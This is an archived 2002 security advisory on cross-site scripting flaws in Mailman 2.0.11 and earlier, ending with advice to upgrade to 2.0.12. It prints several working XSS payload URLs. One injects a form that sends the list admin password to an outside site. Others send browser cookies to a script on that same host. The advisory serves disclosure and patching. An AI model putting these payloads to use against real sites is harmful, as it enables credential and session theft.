25th Jul 2002 [SBWID-5556]
COMMAND
Mailman cross-site scripting bug
SYSTEMS AFFECTED
Mailman 2.0.11 and under it
PROBLEM
office [office@ukky.net] [office@office.ac] [http://www.office.ac/]
says :
Mailman is software to help manage electronic mail discussion lists,
much like Majordomo or Smartmail. And Mailman have web interface
system.
Example
=======
You can recognize the vulnerability with this type of URL;
http://mailman_site/mailman_dirctory/admin/ml-name?"><script>alert("hello")</script>
and that prove that any (malicious) script code is possible on web
interface part of Mailman.
For example, if you access to this URL with Internet Explorer (other
browser is not affected by the URL), the page figure is similar to real
one, but the password of admin you enter and submit are send to another
malicious site (http://www.office.ac/). This URL are valid for version
2.0.10.
http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="></form><form/action="http://www.office.ac/webform.cgi"/method="post"><br
And Mailman 2.0.11 still have vulnerabilities, if you access to these
URL with Internet Explorer (other browser is not affected by these
URL), your information in cookie about the mailman_site could be send
another malicious site (http://www.office.ac/).
http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="/onClick="window.open('http://www.office.ac/j.cgi?'+document.cookie);
http://mailman_site/mailman/subscribe/ml-name?info=<script>document.location%3D"http://www.office.ac/j.cgi?"%2Bdocument.cookie;</script>
SOLUTION
Users should upgrade to Mailman 2.0.12 or later
http://mail.python.org/pipermail/mailman-announce/2002-July/000043.html
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH